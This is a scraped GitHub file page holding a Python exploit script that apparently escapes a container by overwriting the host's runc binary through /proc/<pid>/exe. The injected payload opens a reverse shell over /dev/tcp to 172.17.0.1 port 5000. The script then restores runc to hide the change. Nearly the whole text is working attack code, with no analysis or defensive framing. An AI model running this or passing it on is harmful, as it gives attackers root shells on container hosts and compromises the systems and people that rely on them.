Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

81 lines (72 sloc) 2.02 KB
#!/bin/python3
import os
import stat
import time
host='172.17.0.1'
port='5000'
payload=f'#!/bin/bash\necho "exec 5<>/dev/tcp/{host}/{port} && cat <&5|/bin/bash 2>&5 >&5"|/bin/bash\n'
target_file='/tmp/evil'
if __name__ == '__main__':
with open(target_file,'w') as evil:
evil.write('#!/proc/self/exe --criu')
os.chmod(target_file,stat.S_IXOTH)
found = 0
while found == 0:
procs = os.popen('ps -A -o pid')
for pid in procs:
pid = pid.strip()
if pid == 'PID': continue
if int(pid) > os.getpid():
try:
with open(f'/proc/{pid}/cmdline','r') as cmdline:
if cmdline.read().find('runc') >= 0:
found = pid
except FileNotFoundError:
continue
except ProcessLookupError:
continue
read_handle = -1;
while read_handle == -1:
try:
read_handle = os.open(f'/proc/{found}/exe', os.O_RDONLY) #/proc/xxx/exe is fd to runcinit
except OSError:
continue
except FileNotFoundError:
continue
except PermissionError:
continue
print('Got read handle')
runc = b''
byte = os.read(read_handle,10934200)
while byte != b'':
runc += byte
byte = os.read(read_handle,10934200)
print('Read runc')
write_handle = -1;
while write_handle == -1:
try:
write_handle = os.open(f'/proc/self/fd/{str(read_handle)}',os.O_WRONLY|os.O_TRUNC)
except OSError:
continue
print('Got write handle')
result = os.write(write_handle,str.encode(payload))
if result == len(payload):
print('Successfully wrote payload')
else:
print('Could not write')
os.close(write_handle)
time.sleep(1)
write_handle = -1;
while write_handle == -1:
try:
write_handle = os.open(f'/proc/self/fd/{str(read_handle)}',os.O_WRONLY|os.O_TRUNC)
except OSError:
continue
print('Got write handle again')
result = os.write(write_handle,runc)
if result == len(runc):
print('Successfully restored runc')
else:
print('Could not write')
os.close(write_handle)
os.close(read_handle)
You can’t perform that action at this time.